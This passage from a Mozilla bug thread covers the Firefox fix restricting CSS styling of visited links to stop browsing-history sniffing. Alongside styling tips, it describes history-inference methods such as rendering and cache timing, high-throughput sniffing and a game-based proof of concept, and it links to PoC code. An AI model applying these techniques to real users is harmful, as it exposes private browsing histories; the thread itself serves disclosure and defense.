However, outline causes overflow. This leads to two ways an attacker could use outline to determine whether links are in your history. First, visual overflow is detectable via performance tests, especially if it's set up to cause something the element overlaps with, whose repainting is expensive, to be forced to repaint. Second, scrollable overflow (which outline currently causes in Gecko, but that will hopefully change in the future) can be detected by various element.scroll* methods.
Comment 254•15 years ago
(In reply to comment #251)
> (In reply to comment #250)
> > a:visited { outline: 1px dotted black !important;} in userContent.css
> > does not work anymore
>
> That's as expected. It would work if you change it to:
>
> a:link, a:visited { outline: 1px dotted ! important }
It doesn't seem to make a distinction; the a:link rule now also applies to visited links (which didn't happen in Firefox 3.6)
> a:link { outline-color: transparent ! important }
This is executed
> a:visited { outline-color: black ! important }
This is ignored
Assignee
Comment 255•15 years ago
I don't understand comment 254. If you believe there's a bug, could you file it as a separate bug report?
Assignee
Comment 256•15 years ago
Er, sorry, you're right. It's not supposed to work, since that's a change in the alpha component of the color.
I suppose you could change between white/black if you wanted, but we won't do transparent/black.
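For userContent.css, a variant along these lines should work (a sketch: the same pattern as comment 251, but swapping between two fully opaque colors instead of transparent/black):
a:link, a:visited { outline: 1px dotted !important; }
a:link { outline-color: white !important; }
a:visited { outline-color: black !important; }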
Comment 257•15 years ago
Is it just me, or is this going to be a complete developer nightmare?
Comment 258•15 years ago
(In reply to comment #257)
> is it just me or is this going to be a complete developer nightmare?
At first I thought so too, but so far I haven't seen anything major break with the patch applied. I've noticed it on one site, but I've already contacted the owner, as it is easily fixable by, in this case, using the text-decoration property on "a" instead of "a:visited".
Assignee
Comment 259•15 years ago
Optimistically marking this bug as fixed, although I already know of a few followup bugs that need to be filed.
Status: ASSIGNED → RESOLVED
Closed: 15 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla1.9.3a4
Keywords: dev-doc-needed
Comment 260•15 years ago
I just noticed that we fail the CSS3.info selectors test (http://www.css3.info/selectors-test) with the patches. Since this test is fairly well known and used in many comparisons, I think it's important to ask them to modify or remove the testcases that now fail because of these changes, especially since we do not violate any standards and since WebKit is planning to implement the same thing. Perhaps this should be tracked in a separate bug, and if so, I'd appreciate it if someone other than me created it. Thanks.
Comment 261•15 years ago
Filed bug 558569 about www.css3.info (last comment)
blocking2.0: ? → beta1+
Comment 262•15 years ago
I was told on IRC that this fix is for the upcoming Firefox 4 only, so far.
This will take another half a year, unfortunately. Recently (I haven't pinpointed the date of the paper, though) it was shown that you can figure out zip codes via certain webpages (e.g. weather forecast sites that ask the user to input their zip code); with this, the web-privacy problem could become a real-world privacy problem. This is why it concerns me that, as far as I was able to find out, there seem to be no plans to backport the fix.
The paper in question is located at http://w2spconf.com/2010/papers/p26.pdf .
Maybe it should be discussed whether, despite the amount of work, this fix should be backported to current versions of Firefox.
Comment 263•15 years ago
Mic -
I personally share your concern about how long this will take to get into the field. But with patches like this it's a question of trade-offs. A patch like this should really go through a full beta cycle, and by the time we went through that process it would look more like the Firefox 4 time frame. Plus we would spend a lot of time on backporting instead of working on performance or other features. So as I said, it's a question of trade-offs, which are never easy.
Comment 264•14 years ago
This was documented a while ago:
https://developer.mozilla.org/en/CSS/Privacy_and_the_:visited_selector
Keywords: dev-doc-needed → dev-doc-complete
Comment 266•14 years ago
getComputedStyle is not the only part that is lying; the whole document.getElementById("any_element").style is no longer accessible.
How in the world do you think this is a viable solution?
Best Regards
Assignee
Comment 267•14 years ago
(In reply to comment #266)
> getComputedStyle is not the only part that is lying; the whole
> document.getElementById("any_element").style is no longer accessible.
Why do you think that?
> How in the world do you think this is a viable solution?
It isn't, nor is it what we did.
Comment 268•14 years ago
I mean that I can no longer access, in either a read or write fashion, CSS properties such as font-size in the usual manner, document.getElementById['element'].style.fontSize. Do you have any idea why?
Comment 269•14 years ago
Neither document.getElementsByTagName("a").style.color nor document.getElementById['element'].style.color is accessible anymore. By debugging I can see their values come back as null in the browser. Was this expected to happen?
Comment 270•14 years ago
(In reply to comment #269)
> Neither document.getElementsByTagName("a").style.color
A few things:
- note that you need a "[0]" in there -- getElementsByTagName() returns a list of elements, not a single element.
- Your code just queries the "style" attribute (which is undefined because you probably haven't explicitly set it). That doesn't do (and never has done?) what you probably want. You probably want something like this instead, to get the *computed* style:
> window.getComputedStyle(document.getElementsByTagName("a")[0], "").getPropertyValue("color");
(I just verified that the above line works, in a trivial testcase, in my nightly build.)
Google for "getComputedStyle" to learn more.
Comment 271•14 years ago
Ah, I see from comment 266 that you already knew about getComputedStyle. Then I guess the lesson here for you is that "element.style" is simply an accessor for the style *attribute*, and it'll only contain useful data if you explicitly set the style attribute.
e.g. elem.style.fontSize and .color should both be accessible on this <a> element:
<a style="font-size: 30px; color: yellow">foobar</a>
That behavior has not recently changed.
If you have any further questions or concerns on this, please take them to a Mozilla newsgroup like mozilla.dev.platform* or to a support forum.
* http://www.mozilla.org/about/forums/#dev-platform
Comment 272•14 years ago
Thanks for the clarifications. I have now got it working. Best Regards
Comment 276•14 years ago
Oh, why did you block the ability to set text-decoration, opacity and cursor for visited links? They can't move any elements on the page, and the values for these properties that get reported to the site could be spoofed, so the site wouldn't know whether we had visited any links on that site before.
You already do this when you allow users to style visited links with different colors and spoof the reported values. Why not do the same for other CSS properties that could also be spoofed?
Please give users back the ability to style visited links' text-decoration, opacity, cursor, and the rest of the CSS properties that could be harmlessly spoofed.
Comment 277•14 years ago
(In reply to comment #276)
> oh, why did you block the ability to set text-decoration, opacity and cursor
> for the visited links?
See http://dbaron.org/mozilla/visited-privacy , under "However, this isn't sufficient".
In particular -- cursor can load images, and opacity can affect perf in ways that the page could detect via timing attacks. I'm less sure about text-decoration, but I'm guessing it could affect layout or have subtle perf effects from e.g. gobs and gobs of text with "blink" applied.
Comment 278•14 years ago
text-decoration can cause stuff to move by changing inter-line spacing to make room for underlines, and I recall dbaron saying that *any* change to the set of pixels that are painted can cause a measurable perf difference.
Comment 279•14 years ago
(In reply to comment #278)
> text-decoration can cause stuff to move by changing inter-line spacing to make
> room for underlines, and I recall dbaron saying that *any* change to the set of
> pixels that are painted can cause a measurable perf difference.
AFAIK that's not true.
Pixels affect nothing; a perf difference can only be caused by changes in an element's positioning, and text-decoration cannot affect that at all.
Please, could you check that information?
Comment 280•14 years ago
What is the point of this when queries into global history can be done via other means? Surely someone could just do a timing attack on a cached page element, such as loading an image?
If the image was cached in a way that the server does not need to be queried, the image would load right away.
How is this different from the :visited problem?
Is it just that a timing attack on a cached page element is slower?
Eg: http://www.zdnet.co.uk/news/regulation/2000/12/12/cache-attack-timing-is-everything-2083140/
Comment 281•14 years ago
The point is that cache timing can get you maybe ~1k URLs/min, whereas the JS/CSS method (after my improvements) can get 0.5-5M URLs/min.
That is a HUGE qualitative difference.
http://github.com/saizai/cssfingerprint (I've taken the server down, FYI.)
http://saizai.livejournal.com/960791.html
Anything whatsoever that will cause a JS-detectable rendering change that can be attached to :visited or :link will allow me to do this attack.
I don't have the time now to work on this more, but you can fork my code above to test this text-decoration issue.
Comment 282•13 years ago
Oh my bleep.
My version: Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.2.24) Gecko/20111103 Firefox/3.6.24
Target version for the fix: mozilla1.9.3a4
I just found out about this. And no, "Run a newer version" isn't available for me. And this is almost 10 years old by now.
PLEASE, someone tell me that a security hole this large (I just found http://www.whattheinternetknowsaboutyou.com/top20k?noscript=3 from these comments -- ick) is going to be back patched.
ICK. Yes, I want to see visited links in a different color.
NO, I don't want web sites to be able to play with visited status -- I can just imagine online stores seeing what I'm buying from their competition and using that as advertisement tracking. Or worse.
<Sigh>. Safari doesn't run NoScript, has its own problems, and doesn't support a lot of plug-ins. TenFourFox has its own share of compatibility problems (though in fairness, with Google dropping offline mail, the biggest one is going away). Etc.
Comment 283•13 years ago
michael, Firefox 3.6 is EOL (end of life), i.e. not even critical security holes will be fixed anymore. Yes, that's upsetting in your case of PowerPC Mac, but this bug is not the right forum for that question.
Comment 284•13 years ago
(In reply to Ben Bucksch (:BenB) from comment #283)
> michael, Firefox 3.6 is EOL (end of life), i.e. not even critical security
> holes will be fixed anymore. Yes, that's upsetting in your case of PowerPC
> Mac, but this bug is not the right forum for that question.
3.6 is not EOL. This fix is not going to be back-ported during the months that remain before it is EOL, though. (And please remember that every comment on this old, closed bug spams 140 people)
Comment 285•13 years ago
According to https://developer.mozilla.org/en/CSS/Privacy_and_the_:visited_selector
I could use
background-color
border-color (and its sub-properties)
outline-color.
I haven't gotten outline or background working, by using this:
a:visited {
background-color: lime;
outline: 4px solid lime;
}
I guess these are turned off now too? Color still seems to work.
So the devmo article needs to be updated?
Comment 286•13 years ago
(In reply to Martijn Wargers [:mw22] (QA - IRC nick: mw22) from comment #285)
> I haven't gotten outline or background working, by using this:
> a:visited {
> background-color: lime;
> outline: 4px solid lime;
At least for outline, I suspect you need to set "outline-width" unconditionally (not in a :visited selector) and only have "outline-color" be :visited.
Comment 287•13 years ago
All relevant outline properties except -color, in fact.
Have a look at http://jsfiddle.net/8XDwF/2/
Assignee
Comment 288•13 years ago
And for background, you're not allowed to change the transparency, and the initial value is 'transparent'. You'd need something non-transparent outside of a :visited selector.
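Putting comments 286 and 288 (and the pattern from comment 251) together, a sketch of :visited styling that should still work under the new rules; the specific widths and colors here are only examples:
/* Keep the non-color parts (outline width/style) the same for both states... */
a:link, a:visited { outline: 2px solid; background-color: white; }
/* ...and let :visited swap only one fully opaque color for another. */
a:link { outline-color: yellow; }
a:visited { outline-color: lime; background-color: lime; }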
Comment 289•13 years ago
Is "background-position" blocked intentionally? If changing "background-color" is considered to be safe, then changing "background-position" should be safe as well.
This would be useful to reposition a CSS sprite image depending on the visited state. E.g. make the color of a decorative "arrow" image match the text color.
Assignee
Comment 290•13 years ago
(In reply to Steffen Weber from comment #289)
> Is "background-position" blocked intentionally?
Yes, because it could lead to measurable speed differences.
Comment 291•13 years ago
To anyone in the future who wants to request that a specific CSS property be unblocked from use in :visited selectors: Please file a *new* bug depending on this one; don't comment here. Be prepared to argue not only for the utility of the property in :visited, but for its not exposing visitedness to the site that uses it -- even by minute changes in timing, or other "covert channels".
Comment 292•12 years ago
@Zack Weinberg
I filed a separate bug about background-color, as you suggested:
https://bugzilla.mozilla.org/show_bug.cgi?id=767173
:visited does not take the "background-color" CSS property into account (the docs say the opposite).
Comment 293•12 years ago
Comment on attachment 431539 [details] [diff] [review]
patch 14: make nsStyleContext::FindChildWithRules deal with the visited style context
>+ NS_ABORT_IF_FALSE(aRulesIfVisited || !aRelevantLinkVisited,
>+ "aRelevantLinkVisited should only be set when we have a separate style");
[This crashes if you put a (visited?) link into a document in a chrome docshell.]
Comment 294•12 years ago
re: comment 280 and timing attacks on cached page elements.
Looks like Michal Zalewski has done some more research in this area. He posted this to the WASC list just now. Is it worthwhile spinning off another bug?
As you probably know, most browser vendors have fixed the ability to
enumerate your browsing history through the CSS :visited
pseudo-selector. The fix severely constraints the styling possible for
visited links, and hides it from APIs such as
window.getComputedStyle() [1].
The fix does not prevent attackers from extracting similar information
through cache timing [2], or by examining onerror / onload events for
scripts and images loaded from sites to which you may be logged in.
Nevertheless, the :visited attack is particularly versatile and
reliable, so several people have tried to circumvent the fix by
showing the user a set of hyperlinked snippets of text that, depending
on the browsing history, will blend with the background or remain
visible on the screen. Their visibility can be then indirectly
measured by seeing how the user interacts with the page.
The problem with these attacks is that they are either unrealistic, or
extremely low-throughput. So, here is a slightly more interesting
entry for this contest. The PoC works in Chrome and Firefox, but
should be easily portable to other browsers:
http://lcamtuf.coredump.cx/yahh/
The basic idea behind this inferior clone of Asteroids is that we hurl
a lot of link-based "asteroids" toward your spaceship, but you only
see (and take down) the ones that correspond to the sites you have
visited. There are several tricks to maintain immersion, including
some proportion of "real" asteroids that the application is sure are
visible to you. The approach is easily scalable to hundreds or
thousands of URLs that can be tested very quickly, as discussed here:
http://lcamtuf.blogspot.com/2013/05/some-harmless-old-fashioned-fun-with-css.html
Captain Obvious signing off,
/mz
[1] https://developer.mozilla.org/en-US/docs/CSS/:visited
[2] http://lcamtuf.blogspot.com/2011/12/css-visited-may-be-bit-overrated.html
Comment 295•12 years ago
When I try the PoC at http://lcamtuf.coredump.cx/yahh/ I get pretty inconsistent and unreliable results. In the first few games the visited-sites popup was never launched. Then I visited cnn.com and played the game; the popup came up, but cnn.com wasn't shown as a visited site. Several others that I might have visited did show.
In the next game cnn.com did show on the list of visited sites.
Comment 296•12 years ago
If you want to block those "low-bandwidth" attacks you can set layout.css.visited_links_enabled to false.
Comment 299•6 years ago
Hi,
I found this paper https://www.spinda.net/papers/smith-2018-revisited.pdf in which the authors claim that setting the layout.css.visited_links_enabled flag to false does not work properly:
"Turning off Firefox’s layout.css.visited links enabled configuration flag should eliminate visited link styling
altogether [5, 46]. Not so: disabling the flag fails to block either our visited-link attacks or Paul Stone’s
older one; we reported this bug to Mozilla."
Is Mozilla aware of this?
Thank you
Comment 300•6 years ago
(In reply to erotavlas from comment #299)
That was fixed in bug 1477773.